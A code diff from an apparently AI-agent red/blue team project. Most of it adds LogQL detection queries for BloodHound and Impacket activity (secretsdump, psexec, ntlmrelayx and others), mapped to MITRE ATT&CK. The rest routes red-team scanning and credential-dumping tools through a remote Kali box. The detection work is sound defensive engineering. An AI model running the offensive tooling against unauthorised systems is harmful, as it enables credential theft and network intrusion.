+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_acl_enum"
+ result["_mitre_technique"] = "T1069.002"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_session_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound session enumeration.
+
+ BloodHound enumerates active user sessions on computers using
+ NetSessionEnum and NetWkstaUserEnum APIs to map where users are logged in.
+
+ MITRE ATT&CK: T1033 (System Owner/User Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with session enum indicators.
+ """
+ dn.log_metric("query_template_bh_session", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Session enumeration APIs:
+ # - NetSessionEnum (srvsvc)
+ # - NetWkstaUserEnum (wkssvc)
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(srvsvc|wkssvc|netsession|netwksta)"'
+ ' |~ "(?i)(enum|bloodhound|sharphound|session.*collection)"'
+ )
+
+ logger.info(f"BloodHound session enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_session_enum"
+ result["_mitre_technique"] = "T1033"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_gpo_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound GPO enumeration.
+
+ BloodHound enumerates Group Policy Objects to find GPO-based attack
+ paths and privilege escalation opportunities.
+
+ MITRE ATT&CK: T1615 (Group Policy Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with GPO enum indicators.
+ """
+ dn.log_metric("query_template_bh_gpo", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # GPO enumeration queries:
+ # - groupPolicyContainer objectclass
+ # - gPLink, gPCFileSysPath attributes
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(grouppolicycontainer|gplink|gpcfilesyspath|gpo)"'
+ )
+
+ logger.info(f"BloodHound GPO enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_gpo_enum"
+ result["_mitre_technique"] = "T1615"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_computer_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound computer enumeration.
+
+ BloodHound queries for computer objects with specific attributes
+ to identify targets for lateral movement.
+
+ MITRE ATT&CK: T1018 (Remote System Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with computer enum indicators.
+ """
+ dn.log_metric("query_template_bh_computer", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Computer enumeration with BloodHound-specific attributes:
+ # - operatingsystem, operatingsystemversion
+ # - serviceprincipalname, msds-allowedtodelegateto
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(objectclass=computer|operatingsystem|serviceprincipalname|allowedtodelegateto)"'
+ )
+
+ logger.info(f"BloodHound computer enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_computer_enum"
+ result["_mitre_technique"] = "T1018"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ # =========================================================================
+ # IMPACKET TOOL FINGERPRINTS
+ # Maps to: secretsdump, smbclient, wmiexec, psexec, atexec, dcomexec
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_wmiexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-wmiexec remote execution.
+
+ Wmiexec uses WMI for semi-interactive shell, creating processes via
+ Win32_Process.Create. Output retrieved via SMB temp files.
+
+ MITRE ATT&CK: T1047 (Windows Management Instrumentation)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with wmiexec indicators.
+ """
+ dn.log_metric("query_template_wmiexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Wmiexec patterns:
+ # - WMI process creation events
+ # - cmd.exe /Q /c with output redirection to ADMIN$
+ # - __InstanceCreationEvent subscription
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(wmi|win32_process|root\\\\cimv2)"'
+ ' |~ "(?i)(wmiexec|impacket|cmd.*\\/q.*\\/c|127\\.0\\.0\\.1.*admin\\$)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Wmiexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_wmiexec"
+ result["_mitre_technique"] = "T1047"
+ result["_red_team_tool"] = "wmiexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_psexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-psexec remote execution.
+
+ Psexec uploads a service executable to ADMIN$ share, creates and starts
+ a service, then communicates via named pipe. Creates distinctive events.
+
+ MITRE ATT&CK: T1569.002 (Service Execution)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with psexec indicators.
+ """
+ dn.log_metric("query_template_psexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Psexec patterns:
+ # - Event 7045: Service installed (random 8-char name)
+ # - Service binary in ADMIN$ or C:\Windows
+ # - RemComSvc or similar service names
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(7045|service.*install|psexec|remcom)"'
+ ' |~ "(?i)(admin\\$|\\\\\\\\.*\\\\admin|service.*creat|cmd\\.exe)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Psexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_psexec"
+ result["_mitre_technique"] = "T1569.002"
+ result["_red_team_tool"] = "psexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_smbexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-smbexec remote execution.
+
+ Smbexec creates a service that executes commands via cmd.exe with
+ output redirected to a share file. More stealthy than psexec.
+
+ MITRE ATT&CK: T1569.002 (Service Execution)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with smbexec indicators.
+ """
+ dn.log_metric("query_template_smbexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Smbexec patterns:
+ # - Service with cmd.exe /Q /c echo command
+ # - BTOBTO service name pattern (default)
+ # - Output to C:\__output or __output
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(7045|service|smbexec)"'
+ ' |~ "(?i)(btobto|cmd.*echo.*\\^>|__output|execute\\.bat)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Smbexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_smbexec"
+ result["_mitre_technique"] = "T1569.002"
+ result["_red_team_tool"] = "smbexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_atexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-atexec remote execution.
+
+ Atexec uses the Task Scheduler (ATSVC) to create scheduled tasks
+ for command execution. Creates Event 4698 (scheduled task created).
+
+ MITRE ATT&CK: T1053.002 (Scheduled Task)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with atexec indicators.
+ """
+ dn.log_metric("query_template_atexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Atexec patterns:
+ # - Event 4698: Scheduled task created
+ # - Task name pattern (random characters)
+ # - cmd.exe /C execution in task
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4698|4699|4700|4701|schtask|taskscheduler|atsvc)"'
+ ' |~ "(?i)(atexec|impacket|cmd.*\\/c|schtasks)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Atexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_atexec"
+ result["_mitre_technique"] = "T1053.002"
+ result["_red_team_tool"] = "atexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_dcomexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-dcomexec remote execution.
+
+ Dcomexec uses DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow)
+ to execute commands remotely. Operates over TCP 135 (RPC).
+
+ MITRE ATT&CK: T1021.003 (DCOM)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with dcomexec indicators.
+ """
+ dn.log_metric("query_template_dcomexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Dcomexec patterns:
+ # - DCOM/RPC connections
+ # - MMC20.Application, ShellWindows, ShellBrowserWindow instantiation
+ # - Process created by mmc.exe or explorer.exe
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(dcom|135/tcp|rpc|mmc20|shellwindows|shellbrowser)"'
+ ' |~ "(?i)(dcomexec|impacket|executeshellcommand|document\\.application)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Dcomexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_dcomexec"
+ result["_mitre_technique"] = "T1021.003"
+ result["_red_team_tool"] = "dcomexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_secretsdump_sam(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-secretsdump SAM database dump.
+
+ Secretsdump can dump local SAM database by accessing registry hives
+ remotely via SMB. Retrieves local account hashes.
+
+ MITRE ATT&CK: T1003.002 (SAM)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with SAM dump indicators.
+ """
+ dn.log_metric("query_template_secretsdump_sam", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # SAM dump patterns:
+ # - Remote registry access to SAM, SYSTEM, SECURITY hives
+ # - Event 4663: Object access on registry
+ # - reg save commands
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(registry|hklm|winreg|samr)"'
+ ' |~ "(?i)(sam|system|security|secretsdump|reg.*save)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"SAM dump detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_secretsdump_sam"
+ result["_mitre_technique"] = "T1003.002"
+ result["_red_team_tool"] = "secretsdump"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_secretsdump_lsa(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-secretsdump LSA secrets dump.
+
+ Secretsdump extracts LSA secrets which may contain service account
+ passwords, autologon credentials, and other sensitive data.
+
+ MITRE ATT&CK: T1003.004 (LSA Secrets)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with LSA dump indicators.
+ """
+ dn.log_metric("query_template_secretsdump_lsa", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # LSA secrets dump patterns:
+ # - SECURITY hive access
+ # - LSA policy queries
+ # - $MACHINE.ACC, DefaultPassword, NL$KM patterns
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(lsa|security|policy|secrets)"'
+ ' |~ "(?i)(\\$machine|defaultpassword|nl\\$|dpapi|secretsdump)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"LSA secrets dump detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_secretsdump_lsa"
+ result["_mitre_technique"] = "T1003.004"
+ result["_red_team_tool"] = "secretsdump"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_ntlmrelayx(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-ntlmrelayx NTLM relay attacks.
+
+ Ntlmrelayx intercepts NTLM authentication and relays it to target
+ services like SMB, LDAP, HTTP for unauthorized access.
+
+ MITRE ATT&CK: T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with NTLM relay indicators.
+ """
+ dn.log_metric("query_template_ntlmrelayx", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # NTLM relay patterns:
+ # - Authentication from unexpected source IP
+ # - Rapid auth attempts with same NTLM challenge
+ # - SMB signing not required warnings
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ntlm|relay|responder|inveigh)"'
+ ' |~ "(?i)(ntlmrelayx|smbrelay|signing.*not.*required|coerce)"'
+ )
+
+ logger.info(f"NTLM relay detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_ntlmrelayx"
+ result["_mitre_technique"] = "T1557.001"
+ result["_red_team_tool"] = "ntlmrelayx"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_smbclient(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-smbclient share access.
+
+ Smbclient provides interactive SMB access for enumeration and
+ file operations on remote shares.
+
+ MITRE ATT&CK: T1021.002 (SMB/Windows Admin Shares)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with smbclient indicators.
+ """
+ dn.log_metric("query_template_smbclient", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Smbclient patterns:
+ # - Interactive SMB session characteristics
+ # - Multiple share enumeration
+ # - File browsing patterns
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(smb|445/tcp|cifs|smbclient)"'
+ ' |~ "(?i)(impacket|tree.*connect|shares.*enum|file.*access)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Smbclient detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_smbclient"
+ result["_mitre_technique"] = "T1021.002"
+ result["_red_team_tool"] = "smbclient"
+
+ return result
+
+ # =========================================================================
+ # HOST/USER INVESTIGATION HELPERS
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_host_activity(
+ self,
+ hostname: str,
+ hours_back: int = 24,
+ attack_patterns_only: bool = False,
+ ) -> dict[str, Any]:
+ """Get all activity for a specific host.
+
+ Comprehensive query to gather logs for a host during investigation.
+ Can optionally filter to only show attack-related patterns.
+
+ Args:
+ hostname: Hostname to investigate.
+ hours_back: Hours of logs to search.
+ attack_patterns_only: If True, filter for attack patterns only.
+
+ Returns:
+ All log activity for the specified host.
+ """
+ dn.log_metric("query_template_host_activity", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ if attack_patterns_only:
+ logql = (
+ f'{{hostname=~".*{hostname}.*"}} |~ "(?i)(4625|4624|4662|4769|4768|5140|7045|4688)"'
+ )
+ else:
+ logql = f'{{hostname=~".*{hostname}.*"}}'
+
+ logger.info(f"Host activity query: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=1000)
+ result["_query_template"] = "host_activity"
+ result["_target_host"] = hostname
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_user_activity(
+ self,
+ username: str,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Get all activity for a specific user.
+
+ Comprehensive query to gather all logs mentioning a user account.
+
+ Args:
+ username: Username to investigate.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ All log activity mentioning the specified user.
+ """
+ dn.log_metric("query_template_user_activity", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ logql = f'{{job=~".+"}} |~ "(?i){username}"'
+
+ logger.info(f"User activity query: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=1000)
+ result["_query_template"] = "user_activity"
+ result["_target_user"] = username
+
+ return result
+
+ # =========================================================================
+ # TEMPLATE LISTING
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ def list_query_templates(self) -> list[dict[str, Any]]:
+ """List all available query templates with MITRE mappings.
+
+ Returns:
+ List of templates organized by attack phase, with red team tool correlation.
+ """
+ return [
+ # Reconnaissance
+ {
+ "name": "detect_port_scanning",
+ "description": "Detect nmap/masscan port scanning",
+ "mitre": "T1046",
+ "tactic": "discovery",
+ "red_team_tool": "nmap_scan",
+ },
+ {
+ "name": "detect_user_enumeration",
+ "description": "Detect AD user account enumeration",
+ "mitre": "T1087.002",
+ "tactic": "discovery",
+ "red_team_tool": "enumerate_users",
+ },
+ {
+ "name": "detect_share_enumeration",
+ "description": "Detect SMB share discovery",
+ "mitre": "T1135",
+ "tactic": "discovery",
+ "red_team_tool": "enumerate_shares",
+ },
+ # Credential Access
+ {
+ "name": "detect_secretsdump",
+ "description": "Detect credential dumping via secretsdump",
+ "mitre": "T1003",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_dcsync",
+ "description": "Detect DCSync attack against domain controller",
+ "mitre": "T1003.006",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_kerberoasting",
+ "description": "Detect Kerberoasting TGS ticket requests",
+ "mitre": "T1558.003",
+ "tactic": "credential_access",
+ "red_team_tool": "kerberoast",
+ },
+ {
+ "name": "detect_asrep_roasting",
+ "description": "Detect AS-REP roasting attacks",
+ "mitre": "T1558.004",
+ "tactic": "credential_access",
+ "red_team_tool": "asrep_roast",
+ },
+ {
+ "name": "detect_brute_force",
+ "description": "Detect brute force/password spray attempts",
+ "mitre": "T1110",
+ "tactic": "credential_access",
+ "red_team_tool": None,
+ },
+ # Lateral Movement
+ {
+ "name": "detect_pass_the_hash",
+ "description": "Detect Pass-the-Hash NTLM attacks",
+ "mitre": "T1550.002",
+ "tactic": "lateral_movement",
+ "red_team_tool": "domain_admin_checker",
+ },
+ {
+ "name": "detect_lateral_movement",
+ "description": "Detect PSExec, WMI, WinRM lateral movement",
+ "mitre": "T1021",
+ "tactic": "lateral_movement",
+ "red_team_tool": None,
+ },
+ {
+ "name": "detect_smb_file_access",
+ "description": "Detect suspicious file access on shares",
+ "mitre": "T1039",
+ "tactic": "collection",
+ "red_team_tool": "download_file_content",
+ },
+ # Privilege Escalation
+ {
+ "name": "detect_adcs_exploitation",
+ "description": "Detect ADCS certificate abuse (ESC1-15)",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "certipy_*",
+ "severity": "high",
+ },
+ {
+ "name": "detect_delegation_abuse",
+ "description": "Detect RBCD/delegation privilege escalation",
+ "mitre": "T1134.001",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "rbcd_write",
+ },
+ {
+ "name": "detect_bloodhound_collection",
+ "description": "Detect BloodHound AD enumeration",
+ "mitre": "T1087",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ # Persistence
+ {
+ "name": "detect_golden_ticket",
+ "description": "Detect Golden Ticket creation/usage",
+ "mitre": "T1558.001",
+ "tactic": "persistence",
+ "red_team_tool": "generate_golden_ticket",
+ "severity": "critical",
+ },
+ # Execution
+ {
+ "name": "detect_suspicious_execution",
+ "description": "Detect encoded PowerShell, LOLBins",
+ "mitre": "T1059",
+ "tactic": "execution",
+ "red_team_tool": None,
+ },
+ # ADCS/Certipy Specific (ESC attacks)
+ {
+ "name": "detect_certipy_enumeration",
+ "description": "Detect Certipy certificate template enumeration",
+ "mitre": "T1649",
+ "tactic": "discovery",
+ "red_team_tool": "certipy_find",
+ },
+ {
+ "name": "detect_esc1_attack",
+ "description": "Detect ESC1 - Enrollee Supplies Subject attack",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "certipy_req_esc1",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_esc4_attack",
+ "description": "Detect ESC4 - Certificate template ACL modification",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "severity": "high",
+ },
+ {
+ "name": "detect_esc8_attack",
+ "description": "Detect ESC8 - NTLM relay to AD CS HTTP endpoints",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_certificate_authentication",
+ "description": "Detect authentication using stolen/forged certificates",
+ "mitre": "T1649",
+ "tactic": "credential_access",
+ "red_team_tool": "certipy_auth",
+ },
+ # BloodHound Specific LDAP Queries
+ {
+ "name": "detect_bloodhound_domain_enum",
+ "description": "Detect BloodHound domain trust enumeration",
+ "mitre": "T1482",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_acl_enum",
+ "description": "Detect BloodHound ACL/DACL collection",
+ "mitre": "T1069.002",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_session_enum",
+ "description": "Detect BloodHound session enumeration (NetSessionEnum)",
+ "mitre": "T1033",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_gpo_enum",
+ "description": "Detect BloodHound GPO enumeration",
+ "mitre": "T1615",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_computer_enum",
+ "description": "Detect BloodHound computer object enumeration",
+ "mitre": "T1018",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ # Impacket Tool Fingerprints
+ {
+ "name": "detect_impacket_wmiexec",
+ "description": "Detect impacket-wmiexec WMI remote execution",
+ "mitre": "T1047",
+ "tactic": "execution",
+ "red_team_tool": "wmiexec",
+ },
+ {
+ "name": "detect_impacket_psexec",
+ "description": "Detect impacket-psexec service-based execution",
+ "mitre": "T1569.002",
+ "tactic": "execution",
+ "red_team_tool": "psexec",
+ },
+ {
+ "name": "detect_impacket_smbexec",
+ "description": "Detect impacket-smbexec stealthy service execution",
+ "mitre": "T1569.002",
+ "tactic": "execution",
+ "red_team_tool": "smbexec",
+ },
+ {
+ "name": "detect_impacket_atexec",
+ "description": "Detect impacket-atexec scheduled task execution",
+ "mitre": "T1053.002",
+ "tactic": "execution",
+ "red_team_tool": "atexec",
+ },
+ {
+ "name": "detect_impacket_dcomexec",
+ "description": "Detect impacket-dcomexec DCOM remote execution",
+ "mitre": "T1021.003",
+ "tactic": "lateral_movement",
+ "red_team_tool": "dcomexec",
+ },
+ {
+ "name": "detect_impacket_secretsdump_sam",
+ "description": "Detect secretsdump SAM database extraction",
+ "mitre": "T1003.002",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_impacket_secretsdump_lsa",
+ "description": "Detect secretsdump LSA secrets extraction",
+ "mitre": "T1003.004",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_impacket_ntlmrelayx",
+ "description": "Detect NTLM relay attacks (ntlmrelayx)",
+ "mitre": "T1557.001",
+ "tactic": "credential_access",
+ "red_team_tool": "ntlmrelayx",
+ },
+ {
+ "name": "detect_impacket_smbclient",
+ "description": "Detect impacket-smbclient share access",
+ "mitre": "T1021.002",
+ "tactic": "lateral_movement",
+ "red_team_tool": "smbclient",
+ },
+ # Investigation Helpers
+ {
+ "name": "get_host_activity",
+ "description": "Get all activity for a specific host",
+ "mitre": None,
+ "tactic": "investigation",
+ "red_team_tool": None,
+ },
+ {
+ "name": "get_user_activity",
+ "description": "Get all activity for a specific user",
+ "mitre": None,
+ "tactic": "investigation",
+ "red_team_tool": None,
+ },
+ ]
diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py
index af318b19..a81c8f4a 100644
--- a/src/ares/tools/red/network.py
+++ b/src/ares/tools/red/network.py
@@ -2,12 +2,11 @@
This module provides toolsets for network enumeration, credential harvesting,
password cracking, share pilfering, and golden ticket generation.
+
+All tools execute commands remotely on the Kali attack box via AWS SSM.
"""
import logging
-import os
-import subprocess
-import tempfile
import time
from datetime import datetime, timezone
from typing import Any
@@ -24,10 +23,25 @@
TimelineEvent,
User,
)
+from ares.core.remote import run_remote
logger = logging.getLogger(__name__)
+def _run_tool(cmd: list[str], timeout_seconds: int = 300) -> tuple[str, str, int]:
+ """Execute a command on the remote Kali attack box.
+
+ Args:
+ cmd: Command as list of arguments
+ timeout_seconds: Maximum execution time
+
+ Returns:
+ Tuple of (stdout, stderr, return_code)
+ """
+ result = run_remote(cmd, timeout_seconds=timeout_seconds)
+ return result.stdout, result.stderr, result.return_code
+
+
class NetworkEnumerationTools(Toolset):
"""Tools for network scanning and enumeration."""
@@ -58,15 +72,15 @@ def nmap_scan(self, target: str) -> str:
>>> result = nmap_scan("192.168.1.2")
>>> result = nmap_scan("192.168.1.2 192.168.1.3 192.168.1.4")
"""
- cmd = ["nmap", "-T4", "-sS", "-sV", "--open"] + target.split(" ")
+ cmd = ["nmap", "-T4", "-sV", "--open"] + target.split(" ")
try:
logger.info(f"[*] Scanning targets: {target}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=300)
- if result.returncode != 0:
- logger.error(f"[!] Nmap scan failed: {result.stderr}")
- return result.stderr
+ if returncode != 0:
+ logger.error(f"[!] Nmap scan failed: {stderr}")
+ return stderr or f"Nmap scan failed with code {returncode}"
logger.info(f"[*] Nmap scan completed for target {target}")
@@ -75,11 +89,8 @@ def nmap_scan(self, target: str) -> str:
for ip in target.split():
self.state.queried_hosts.add(ip)
- return result.stdout
+ return stdout
- except subprocess.TimeoutExpired:
- logger.error("Nmap scan timed out after 5 minutes")
- return "Nmap scan timed out after 5 minutes"
except Exception as e:
logger.error(f"Scan failed: {e!s}")
return f"Scan failed: {e!s}"
@@ -118,15 +129,13 @@ def enumerate_users(self, target: str, username: str, password: str, domain: str
cmd.append("--users")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(
f"[*] User enumeration completed for {target} (user:{username}, domain:{domain})"
)
- return result.stdout
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return f"User enumeration timed out for {target}"
except Exception as e:
logger.error(f"User enumeration failed: {e}")
return f"User enumeration failed for {target}: {e}"
@@ -165,13 +174,11 @@ def enumerate_shares(
cmd.append("--shares")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(f"[*] Share enumeration completed for {target}")
- return result.stdout
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return f"Share enumeration timed out for {target}"
except Exception as e:
logger.error(f"Share enumeration failed: {e}")
return f"Share enumeration failed for {target}: {e}"
@@ -186,6 +193,27 @@ def set_state(self, state: RedTeamState) -> None:
"""Set the operation state for this toolset."""
self.state = state
+ def _check_smb_connectivity(self, target: str, timeout_seconds: int = 5) -> tuple[bool, str]:
+ """Check if SMB port 445 is reachable on target.
+
+ Args:
+ target: Target IP address
+ timeout_seconds: Connection timeout for nc command
+
+ Returns:
+ Tuple of (is_reachable, error_message)
+ """
+ cmd = ["nc", "-zv", "-w", str(timeout_seconds), target, "445"]
+ try:
+ # AWS SSM has a minimum timeout of 30 seconds
+ ssm_timeout = max(30, timeout_seconds + 5)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=ssm_timeout)
+ if returncode == 0:
+ return True, ""
+ return False, f"SMB port 445 not reachable: {stderr or stdout}"
+ except Exception as e:
+ return False, f"Connectivity check failed: {e}"
+
@dn.tool_method
def secretsdump(
self,
@@ -194,8 +222,11 @@ def secretsdump(
password: str | None = None,
hash: str | None = None,
domain: str | None = None,
+ dc_ip: str | None = None,
